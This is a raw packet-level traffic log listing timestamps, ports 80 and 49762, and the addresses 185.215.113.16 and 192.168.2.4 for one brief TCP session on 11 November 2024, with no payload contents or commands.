Nov 11, 2024 01:14:23.311690092 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311701059 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311712980 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311721087 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311722994 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311738968 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311767101 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311805964 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311824083 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311832905 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311846972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311858892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311860085 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311870098 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311902046 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.311976910 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311989069 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.311999083 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312009096 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312021017 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312047005 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312135935 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312145948 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312156916 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312169075 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312174082 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312181950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312195063 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312230110 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312278032 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312287092 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312297106 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312309980 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312319994 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312325001 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312338114 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312375069 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312474966 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312484980 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312494993 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312506914 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312520981 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312531948 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312614918 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312628031 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312637091 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312649012 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312670946 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312685966 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312710047 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312757015 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312767982 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312778950 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312791109 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312799931 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312803030 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312822104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312825918 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312832117 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312843084 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312851906 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312855959 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312877893 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312892914 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312896013 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312906027 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312917948 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312930107 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312938929 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312941074 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312953949 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312963963 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.312967062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312980890 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.312989950 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313004017 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313008070 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313020945 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313025951 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313036919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313047886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313050985 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313059092 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313061953 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313072920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313081980 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313086033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313098907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313107967 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313112974 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313126087 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313129902 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313137054 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313157082 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313163042 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313174963 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313182116 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313186884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313194990 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313199997 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313211918 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313225031 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313252926 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313307047 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313318968 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313329935 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313342094 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313342094 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313353062 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313364983 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313375950 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313376904 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313390017 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313400984 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313409090 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313416004 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313420057 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313437939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313446045 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313446045 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313448906 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313460112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313472986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313477039 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313486099 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313497066 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313505888 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313509941 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313520908 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313530922 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313534021 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313574076 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313585997 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313596010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313599110 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313613892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313616037 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313627005 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313637972 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313637972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313652039 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313658953 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313663006 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313674927 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313687086 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313687086 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313704014 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313714981 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313718081 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313725948 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313730955 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313744068 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313754082 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313756943 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313766956 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313779116 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313782930 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313791990 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313803911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313803911 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313822985 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313839912 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313848972 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313852072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313864946 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313874960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313884020 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313888073 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313899994 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313905954 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313913107 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.313931942 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.313956976 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314001083 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314012051 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314023972 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314037085 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314062119 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314155102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314167023 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314177990 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314188957 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314199924 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314202070 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314214945 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314214945 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314227104 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314239979 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314248085 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314273119 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314282894 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314301968 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314321041 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314337969 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314337969 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314348936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314357996 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314378977 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314390898 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314421892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314433098 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314444065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314462900 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314481020 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314583063 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314594984 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314605951 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314616919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314630032 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314637899 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314641953 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314646959 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314655066 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314666986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314670086 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314678907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314692974 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314722061 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314726114 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314738035 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314748049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314759970 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314771891 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314774036 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314783096 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314786911 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314796925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314807892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314816952 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314820051 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314835072 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314843893 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314862967 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314865112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314877987 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314888954 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314888954 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314901114 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314902067 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314913988 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314923048 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314925909 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314935923 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314939022 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.314963102 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314985037 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.314994097 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315005064 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315016031 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315027952 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315036058 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315040112 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315053940 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315057039 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315067053 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315071106 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315090895 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315109015 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315112114 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315124989 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315135956 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315148115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315155983 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315160036 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315172911 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315201044 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315244913 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315258026 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315273046 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315285921 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315294027 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315306902 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315340042 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315371990 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315383911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315393925 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315406084 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315409899 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315418959 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315431118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315437078 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315453053 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315484047 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315515041 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315526962 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315537930 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315550089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315557003 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315562010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315574884 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315581083 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315587044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315598965 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315607071 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315610886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315623045 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315632105 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315651894 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315654039 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315665960 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315665960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315677881 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315690994 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315736055 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315828085 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315845013 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315856934 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315869093 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315871954 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315881968 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315895081 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315903902 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315907001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315920115 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315927029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315932035 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315938950 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315943956 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315956116 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315963984 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315968037 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315987110 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.315988064 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.315998077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316008091 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316009998 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316021919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316024065 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316035986 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316047907 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316062927 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316083908 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316119909 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316132069 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316140890 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316154003 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316163063 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.316165924 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316179037 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.316180944 CET	49762	80	192.168.2.4	185.215.113.16
